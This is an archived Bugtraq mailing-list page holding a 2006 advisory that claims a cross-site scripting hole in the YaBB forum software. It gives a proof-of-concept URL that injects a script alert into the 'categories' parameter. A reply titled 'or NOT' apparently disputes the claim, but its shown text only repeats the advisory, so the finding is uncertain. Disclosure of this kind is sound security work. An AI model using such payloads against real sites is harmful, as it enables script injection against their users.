Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Yabb XSS
Aug 10 2006 04:13AM
Outlaw aria-security net
(1 replies)
########################################################################
###################
#Aria-Security.net Advisory #
#Discovered by: OUTLAW #
#< www.Aria-security.net > #
#Gr33t to: A.u.r.a & C0d3r & l2odon & R@1D3N @ DrtRp & #
########################################################################
###################
#Software: YaBB
#Attack method: Cross Site Scripting
#
#
#Proof of Concept:
#
#index.php?action=faqmy&myfaq=yes&id_cat=1&categories=<script>alert("xss
")</script>
#
#----------------------------------------------------------
#
#Solution
#
#No Solutions
#
#Contact : Outlaw (at) aria-security (dot) net [email concealed]
#
[ reply ]
Re: Yabb XSS - or NOT
Aug 13 2006 09:56PM
Volker Tanger (vtlists wyae de)
Privacy Statement
Copyright 2009, SecurityFocus
###################
#Aria-Security.net Advisory #
#Discovered by: OUTLAW #
#< www.Aria-security.net > #
#Gr33t to: A.u.r.a & C0d3r & l2odon & R@1D3N @ DrtRp & #
########################################################################
###################
#Software: YaBB
#Attack method: Cross Site Scripting
#
#
#Proof of Concept:
#
#index.php?action=faqmy&myfaq=yes&id_cat=1&categories=<script>alert("xss
")</script>
#
#----------------------------------------------------------
#
#Solution
#
#No Solutions
#
#Contact : Outlaw (at) aria-security (dot) net [email concealed]
#
[ reply ]